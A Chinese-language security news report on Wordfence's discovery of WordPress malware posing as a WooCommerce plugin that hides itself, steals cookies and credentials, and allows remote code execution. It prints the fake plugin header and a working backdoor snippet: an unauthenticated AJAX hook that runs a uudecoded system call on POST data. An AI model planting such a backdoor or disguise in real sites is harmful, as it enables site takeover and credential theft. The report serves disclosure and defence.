新型 WordPress 恶意软件伪装成具有数据渗入和 RCE 功能的合法插件-安全KER

WordPress Malware, Hidden Plugin

Wordfence Threat Intelligence团队发现了一个欺骗性且高度持久的WordPress恶意软件变体,该变体将自己伪装成合法的插件 – 包括评论标题,管理UI和多层混淆。尽管外观,这种恶意软件默默地窃取敏感数据,包括登录cookie和管理员凭据,并实现远程代码执行。

“这个恶意软件包含的代码,确保它仍然隐藏在管理员仪表板中。它具有密码提取功能……基于AJAX的远程代码执行机制和未完成的代码表明它仍在开发中,“Wordfence解释道。该恶意软件于2025年4月24日在网站清理期间首次发现。

恶意软件位于/wp-contents/plugins/下自己的目录中,并包含似乎是合法的插件头,甚至模仿WooCommerce产品插件等已知插件:

<?php
/*
 * Plugin Name: WooCommerce Product Add-ons
 * Plugin URI: https://woocommerce.com/products/product-add-ons/
 * Description: Extend your WooCommerce products with custom fields, checkboxes, dropdowns, and more. Perfect for personalized products.
 * Author: WooCommerce
 * Author URI: https://woocommerce.com/
 * Version: 6.4.0
 * Text Domain: woocommerce-product-addons
 * License: GPLv2 or later
 * Requires PHP: 7.0
 * Requires at least: 5.6
 * WC requires at least: 6.0
 * WC tested up to: 8.0
 */

“我们想强调,这并不意味着WooCommerce插件与恶意软件有任何关系,”该团队指出。

为了避免检测,恶意软件使用all_plugins过滤器从WordPress管理界面中的插件页面隐藏自己。

恶意软件配备了一个泄漏机制,可以将敏感的用户数据传输到命令和控制(C2)服务器,其URL存储在WordPress wp_options表中。

使用 Cookie 和 AJAX 操作,恶意软件会收集:

- WordPress用户名和电子邮件地址
- 会话 Cookie

IP地址和用户代理
登录凭据(通过 wp_login 和 authentication 钩子)

“cookie可用于劫持用户的会话并代表他们执行操作,”报告指出。数据通过base64编码和ROT13加密发送到攻击者的服务器,以模糊检测。

恶意软件还注册了一个nopriv AJAX操作,这意味着它可以在没有身份验证的情况下触发:

add_action('wp_ajax_nopriv_redacted', function() {
    if (isset($_POST['redacted'])) {
        $class = new ReflectionFunction(convert_uudecode("&<WES=&5M`")); $class->invoke($_POST['redacted']);
    }
});